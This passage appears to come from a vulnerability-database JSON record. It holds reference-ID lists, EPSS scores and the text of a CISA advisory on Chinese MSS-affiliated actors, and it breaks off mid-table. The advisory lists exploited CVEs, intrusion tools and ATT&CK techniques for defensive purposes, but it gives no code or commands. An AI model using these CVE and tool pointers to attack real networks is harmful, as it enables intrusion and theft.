"AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:35C65409F622AE1FD9BC7E13896CF1C7", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:F96D35D14AC570674EB41982220B37CF"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "PAPERCUT_MF_CVE-2023-27350.NBIN", "PAPERCUT_NG_CVE-2023-27350.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154176", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:172022", "PACKETSTORM:172512"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:08ED1091DF14107FE6A0D08832D5A771", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "saint", "idList": ["SAINT:265661B74BC72F0361AE7BB83EAC4EA3", "SAINT:648936FBB2CAC7D3895D33C618D275A9"]}, {"type": "securelist", "idList": ["SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:814ED3F1F91D0B8B45726FE2D690E659", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D2A31D9DDF7F5C9F3BACAF128071FF23", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4959B86491B72239BCAF1958D167D57D", "THN:49C9DC08E702586D9FA9BB0CF56685EC", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:6B73AB5566DB08CABFAF90D72C6C6CDE", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:CB99895FF40AEB1E8584201D05BC2390", "THN:CBE86972C4502EF52986B8EF290028F4", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:DACFF45926CFB4D006F537C835A3EE55", "THN:E35C79A0DEB43A22940D0D123D5D1112", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F5AAB2D7C2FD2C0D5083443513D133FF"]}, {"type": "threatpost", "idList": ["THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:AF253A6BAF5066672B7AB1ECECFCC35B"]}, {"type": "zdi", "idList": ["ZDI-23-233"]}, {"type": "zdt", "idList": ["1337DAY-ID-33140", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-38623", "1337DAY-ID-38704"]}]}, "score": {"value": 10.9, "vector": "NONE"}, "epss": [{"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2020-5902", "epss": 0.97562, "percentile": 0.99995, "modified": "2023-05-01"}], "vulnersScore": 10.9}, "_state": {"dependencies": 1685741190, "score": 1685718568, "epss": 0}, "_internal": {"score_hash": "21220272a468d098ee20bd2fe283a2d7"}}
{"ics": [{"lastseen": "2023-06-02T15:10:16", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: 